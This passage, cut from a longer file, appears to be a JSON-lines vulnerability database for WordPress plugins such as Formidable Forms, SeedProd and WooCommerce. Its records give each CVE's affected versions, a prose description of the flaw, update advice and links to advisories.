version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/the-plus-addons-for-elementor-page-builder\\\/tags\\\/6.2.0\\\/modules\\\/widgets\\\/tp_countdown.php#L1868\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/the-plus-addons-for-elementor-page-builder\\\/tags\\\/6.2.0\\\/modules\\\/widgets\\\/tp_countdown.php#L1868\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/the-plus-addons-for-elementor-page-builder\\\/tags\\\/6.2.0\\\/modules\\\/widgets\\\/tp_page_scroll.php#L1015\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/the-plus-addons-for-elementor-page-builder\\\/tags\\\/6.2.0\\\/modules\\\/widgets\\\/tp_page_scroll.php#L1015\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/the-plus-addons-for-elementor-page-builder\\\/tags\\\/6.2.0\\\/modules\\\/widgets\\\/tp_syntax_highlighter.php#L1043\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/the-plus-addons-for-elementor-page-builder\\\/tags\\\/6.2.0\\\/modules\\\/widgets\\\/tp_syntax_highlighter.php#L1043\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3252092\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3252092\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fbf86da7-621d-4fb7-ba16-d132db5b602a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fbf86da7-621d-4fb7-ba16-d132db5b602a?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10606","slug":"wp-travel-engine","versionImpact":"6.2.1","versionEndExcluding":"6.2.2","description":"The WP Travel Engine \u2013 Tour Booking Plugin \u2013 Tour Operator Software plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the wpte_onboard_save_function_callback() function in all versions up to, and including, 6.2.1. This makes it possible for authenticated attackers, with contributor-level access and above, to modify several settings that could have an impact such as lost revenue and page updates.","recommendation":"Update to version 6.2.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3193913\\\/wp-travel-engine\\\/tags\\\/6.2.2\\\/includes\\\/class-wp-travel-engine-onboard.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3193913\\\/wp-travel-engine\\\/tags\\\/6.2.2\\\/includes\\\/class-wp-travel-engine-onboard.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c91d1ec0-0430-4ddd-b6b1-25af0b5cea9d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c91d1ec0-0430-4ddd-b6b1-25af0b5cea9d?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-0775","slug":"woocommerce","versionImpact":"6.2.0","versionEndExcluding":"6.2.1","description":"The WooCommerce WordPress plugin before 6.2.1 does not have proper authorisation check when deleting reviews, which could allow any authenticated users, such as subscriber to delete arbitrary comment","recommendation":"Update to version 6.2.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b76dbf37-a0a2-48cf-bd85-3ebbc2f394dd\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b76dbf37-a0a2-48cf-bd85-3ebbc2f394dd\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2683324\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2683324\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/developer.woocommerce.com\\\/2022\\\/02\\\/22\\\/woocommerce-6-2-1-security-fix\\\/\",\"name\":\"https:\\\/\\\/developer.woocommerce.com\\\/2022\\\/02\\\/22\\\/woocommerce-6-2-1-security-fix\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12099","slug":"dollie","versionImpact":"6.2.0","versionEndExcluding":"6.2.1","description":"The Dollie Hub \u2013 Build Your Own WordPress Cloud Platform plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 6.2.0 via the 'elementor-template' shortcode due to insufficient restrictions on which posts can be included. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract data from password protected, private, or draft posts that they should not have access to.","recommendation":"Update to version 6.2.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3201770%40dollie&new=3201770%40dollie&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3201770%40dollie&new=3201770%40dollie&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f29514d0-20a5-43f2-bf36-660579103220?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f29514d0-20a5-43f2-bf36-660579103220?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11281","slug":"woo-point-of-sale","versionImpact":"6.1.0","versionEndExcluding":"6.2.0","description":"The WooCommerce Point of Sale plugin for WordPress is vulnerable to privilege escalation in all versions up to, and including, 6.1.0. This is due to insufficient validation on the 'logged_in_user_id' value when option values are empty and the ability for attackers to change the email of arbitrary user accounts. This makes it possible for unauthenticated attackers to change the email of arbitrary user accounts, including administrators, and reset their password to gain access to the account.","recommendation":"Update to version 6.2.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/wordpress-woocommerce-pos-system-point-of-sale\\\/21254976\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/wordpress-woocommerce-pos-system-point-of-sale\\\/21254976\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2a0671b1-1414-4315-8a2d-bd1aabe091a4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2a0671b1-1414-4315-8a2d-bd1aabe091a4?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11829","slug":"the-plus-addons-for-elementor-page-builder","versionImpact":"6.1.8","versionEndExcluding":"6.2.0","description":"The The Plus Addons for Elementor \u2013 Elementor Addons, Page Templates, Widgets, Mega Menu, WooCommerce plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Table Widget's searchable_label parameter in all versions up to, and including, 6.1.8 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 6.2.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3207945\\\/the-plus-addons-for-elementor-page-builder\\\/tags\\\/6.1.2\\\/modules\\\/widgets\\\/tp_table.php?old=3207456&old_path=the-plus-addons-for-elementor-page-builder%2Ftags%2F6.1.1%2Fmodules%2Fwidgets%2Ftp_table.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3207945\\\/the-plus-addons-for-elementor-page-builder\\\/tags\\\/6.1.2\\\/modules\\\/widgets\\\/tp_table.php?old=3207456&old_path=the-plus-addons-for-elementor-page-builder%2Ftags%2F6.1.1%2Fmodules%2Fwidgets%2Ftp_table.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3218225\\\/the-plus-addons-for-elementor-page-builder\\\/tags\\\/6.1.4\\\/modules\\\/widgets\\\/tp_table.php?old=3212455&old_path=the-plus-addons-for-elementor-page-builder%2Ftags%2F6.1.3%2Fmodules%2Fwidgets%2Ftp_table.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3218225\\\/the-plus-addons-for-elementor-page-builder\\\/tags\\\/6.1.4\\\/modules\\\/widgets\\\/tp_table.php?old=3212455&old_path=the-plus-addons-for-elementor-page-builder%2Ftags%2F6.1.3%2Fmodules%2Fwidgets%2Ftp_table.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?old_path=\\\/the-plus-addons-for-elementor-page-builder\\\/tags\\\/6.1.8&new_path=\\\/the-plus-addons-for-elementor-page-builder\\\/tags\\\/6.2.0&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?old_path=\\\/the-plus-addons-for-elementor-page-builder\\\/tags\\\/6.1.8&new_path=\\\/the-plus-addons-for-elementor-page-builder\\\/tags\\\/6.2.0&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/edf62f82-448a-4ed8-8d4b-7215223494cb?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/edf62f82-448a-4ed8-8d4b-7215223494cb?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1405","slug":"formidable","versionImpact":"6.1.2","versionEndExcluding":"6.2","description":"The Formidable Forms WordPress plugin before 6.2 unserializes user input, which could allow anonymous users to perform PHP Object Injection when a suitable gadget is present.","recommendation":"Update to version 6.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8c727a31-ff65-4472-8191-b1becc08192a\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8c727a31-ff65-4472-8191-b1becc08192a\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-50874","slug":"ajax-load-more","versionEndExcluding":"6.2","description":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Darren Cooney WordPress Infinite Scroll \u2013 Ajax Load More allows Stored XSS.This issue affects WordPress Infinite Scroll \u2013 Ajax Load More: from n\/a through 6.1.0.1.\n\n","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/ajax-load-more\\\/wordpress-ajax-load-more-plugin-6-1-0-1-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/ajax-load-more\\\/wordpress-ajax-load-more-plugin-6-1-0-1-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3949","slug":"coming-soon","versionImpact":"6.18.15","versionEndExcluding":"6.18.16","description":"The Website Builder by SeedProd \u2014 Theme Builder, Landing Page Builder, Coming Soon Page, Maintenance Mode plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the 'seedprod_lite_get_revisisons' function in all versions up to, and including, 6.18.15. This makes it possible for authenticated attackers, with Subscriber-level access and above, to read the content of arbitrary landing page revisions.","recommendation":"Update to version 6.18.16, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/coming-soon\\\/tags\\\/6.18.15\\\/app\\\/lpage.php#L820\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/coming-soon\\\/tags\\\/6.18.15\\\/app\\\/lpage.php#L820\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3288645\\\/coming-soon\\\/trunk\\\/app\\\/lpage.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3288645\\\/coming-soon\\\/trunk\\\/app\\\/lpage.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.seedprod.com\\\/docs\\\/changelog\\\/\",\"name\":\"https:\\\/\\\/www.seedprod.com\\\/docs\\\/changelog\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/669b0f30-8958-420c-93c5-0103b71967dd?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/669b0f30-8958-420c-93c5-0103b71967dd?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11188","slug":"formidable","versionImpact":"6.16.1.2","versionEndExcluding":"6.16.2","description":"The Formidable Forms \u2013 Contact Form Plugin, Survey, Quiz, Payment, Calculator Form & Custom Form Builder plugin for WordPress is vulnerable to POST-Based Reflected Cross-Site Scripting via the Custom HTML Form parameters in all versions up to, and including, 6.16.1.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 6.16.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/formidable\\\/tags\\\/6.16\\\/classes\\\/helpers\\\/FrmFieldsHelper.php#L158\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/formidable\\\/tags\\\/6.16\\\/classes\\\/helpers\\\/FrmFieldsHelper.php#L158\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/da84aa80-7ef6-4846-870d-07bf88652329?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/da84aa80-7ef6-4846-870d-07bf88652329?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1072","slug":"coming-soon","versionImpact":"6.15.21","versionEndExcluding":"6.15.22","description":"The Website Builder by SeedProd \u2014 Theme Builder, Landing Page Builder, Coming Soon Page, Maintenance Mode plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the seedprod_lite_new_lpage function in all versions up to, and including, 6.15.21. This makes it possible for unauthenticated attackers to change the contents of coming-soon, maintenance pages, login and 404 pages set up with the plugin. Version 6.15.22 addresses this issue but introduces a bug affecting admin pages. We suggest upgrading to 6.15.23.","recommendation":"Update to version 6.15.22, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/78d7920b-3e20-43c7-a522-72bac824c2cb?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/78d7920b-3e20-43c7-a522-72bac824c2cb?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3029567\\\/coming-soon\\\/trunk\\\/app\\\/lpage.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3029567\\\/coming-soon\\\/trunk\\\/app\\\/lpage.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4975","slug":"coming-soon","versionImpact":"6.15.13.1","versionEndExcluding":"6.15.15.3","description":"The Website Builder by SeedProd plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 6.15.13.1. This is due to missing or incorrect nonce validation on functionality in the builder.php file. This makes it possible for unauthenticated attackers to change the stripe connect token via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 6.15.15.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2cb5370f-14aa-445d-bda3-62a0dd068fc5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2cb5370f-14aa-445d-bda3-62a0dd068fc5?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/coming-soon\\\/trunk\\\/resources\\\/views\\\/builder.php#L164\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/coming-soon\\\/trunk\\\/resources\\\/views\\\/builder.php#L164\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2968455\\\/coming-soon\\\/trunk\\\/resources\\\/views\\\/builder.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2968455\\\/coming-soon\\\/trunk\\\/resources\\\/views\\\/builder.php\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9768","slug":"formidable","versionImpact":"6.14","versionEndExcluding":"6.14.1","description":"The Formidable Forms  WordPress plugin before 6.14.1 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 6.14.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3c4ff11b-4a06-433d-8f0e-4069865721c0\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3c4ff11b-4a06-433d-8f0e-4069865721c0\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5144","slug":"the-events-calendar","versionImpact":"6.13.2","versionEndExcluding":"6.13.2.1","description":"The The Events Calendar plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018data-date-*\u2019 parameters in all versions up to, and including, 6.13.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 6.13.2.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/bootstrap-datepicker.readthedocs.io\\\/en\\\/latest\\\/index.html#data-api\",\"name\":\"https:\\\/\\\/bootstrap-datepicker.readthedocs.io\\\/en\\\/latest\\\/index.html#data-api\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/uxsolutions\\\/bootstrap-datepicker\\\/blob\\\/master\\\/js\\\/bootstrap-datepicker.js#L131\",\"name\":\"https:\\\/\\\/github.com\\\/uxsolutions\\\/bootstrap-datepicker\\\/blob\\\/master\\\/js\\\/bootstrap-datepicker.js#L131\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/the-events-calendar\\\/tags\\\/6.12.0.1\\\/vendor\\\/bootstrap-datepicker\\\/js\\\/bootstrap-datepicker.min.js\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/the-events-calendar\\\/tags\\\/6.12.0.1\\\/vendor\\\/bootstrap-datepicker\\\/js\\\/bootstrap-datepicker.min.js\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/the-events-calendar\\\/tags\\\/6.13.0\\\/vendor\\\/bootstrap-datepicker\\\/js\\\/bootstrap-datepicker.min.js\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/the-events-calendar\\\/tags\\\/6.13.0\\\/vendor\\\/bootstrap-datepicker\\\/js\\\/bootstrap-datepicker.min.js\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3307301\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3307301\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/56822fe5-352c-4269-9fab-d8c796362b74?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/56822fe5-352c-4269-9fab-d8c796362b74?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13795","slug":"ecwid-shopping-cart","versionImpact":"6.12.27","versionEndExcluding":"6.12.28","description":"The Ecwid by Lightspeed Ecommerce Shopping Cart plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 6.12.27. This is due to missing or incorrect nonce validation on the ecwid_deactivate_feedback() function. This makes it possible for unauthenticated attackers to send deactivation messages on behalf of a site owner via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 6.12.28, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3241777%40ecwid-shopping-cart&new=3241777%40ecwid-shopping-cart&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3241777%40ecwid-shopping-cart&new=3241777%40ecwid-shopping-cart&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f1eb9ec6-897a-4c38-a85c-033d7050dcfa?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f1eb9ec6-897a-4c38-a85c-033d7050dcfa?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2293","slug":"site-reviews","versionImpact":"6.11.4","versionEndExcluding":"6.11.7","description":"The Site Reviews plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the user display name in all versions up to, and including, 6.11.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with subscriber access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 6.11.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/823418d9-a231-4306-8575-2937a491509f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/823418d9-a231-4306-8575-2937a491509f?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/site-reviews\\\/trunk\\\/views\\\/partials\\\/listtable\\\/filter.php#L5\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/site-reviews\\\/trunk\\\/views\\\/partials\\\/listtable\\\/filter.php#L5\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?old_path=\\\/site-reviews\\\/tags\\\/6.11.4&old=3049214&new_path=\\\/site-reviews\\\/tags\\\/6.11.7&new=3049214&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?old_path=\\\/site-reviews\\\/tags\\\/6.11.4&old=3049214&new_path=\\\/site-reviews\\\/tags\\\/6.11.7&new=3049214&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6725","slug":"formidable","versionImpact":"6.11.1","versionEndExcluding":"6.11.2","description":"The Formidable Forms \u2013 Contact Form Plugin, Survey, Quiz, Payment, Calculator Form & Custom Form Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018html\u2019 parameter in all versions up to, and including, 6.11.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with form editing permissions and Subscriber-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 6.11.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/848cfa72-4211-4576-91c2-4f643e3161c3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/848cfa72-4211-4576-91c2-4f643e3161c3?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/formidable\\\/trunk\\\/classes\\\/models\\\/fields\\\/FrmFieldType.php#L875\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/formidable\\\/trunk\\\/classes\\\/models\\\/fields\\\/FrmFieldType.php#L875\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3128202\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3128202\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6699","slug":"wp-compress-image-optimizer","versionImpact":"6.10.33","versionEndExcluding":"6.10.34","description":"The WP Compress \u2013 Image Optimizer [All-In-One] plugin for WordPress is vulnerable to Directory Traversal in all versions up to, and including, 6.10.33 via the css parameter. This makes it possible for unauthenticated attackers to read the contents of arbitrary files on the server, which can contain sensitive information.","recommendation":"Update to version 6.10.34, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/defb87dd-bf5f-411f-b948-699337d05d44?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/defb87dd-bf5f-411f-b948-699337d05d44?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3009183%40wp-compress-image-optimizer%2Ftrunk&old=2994665%40wp-compress-image-optimizer%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3009183%40wp-compress-image-optimizer%2Ftrunk&old=2994665%40wp-compress-image-optimizer%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12409","slug":"simplepress","versionImpact":"6.10.11","versionEndExcluding":"6.10.12","description":"The Simple:Press Forum plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 's' parameter in all versions up to, and including, 6.10.11 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 6.10.12, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simplepress\\\/trunk\\\/admin\\\/panel-plugins\\\/forms\\\/spa-plugins-list-form.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simplepress\\\/trunk\\\/admin\\\/panel-plugins\\\/forms\\\/spa-plugins-list-form.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3230289%40simplepress&new=3230289%40simplepress&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3230289%40simplepress&new=3230289%40simplepress&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b9ebeb96-2f39-488e-aef6-d5af0a37c24a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b9ebeb96-2f39-488e-aef6-d5af0a37c24a?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10483","slug":"simplepress","versionImpact":"6.10.10","versionEndExcluding":"6.10.11","description":"The Simple:Press Forum WordPress plugin before 6.10.11 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting.","recommendation":"Update to version 6.10.11, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c7e3c473-09b2-473b-87d7-0a01d8f52086\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c7e3c473-09b2-473b-87d7-0a01d8f52086\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
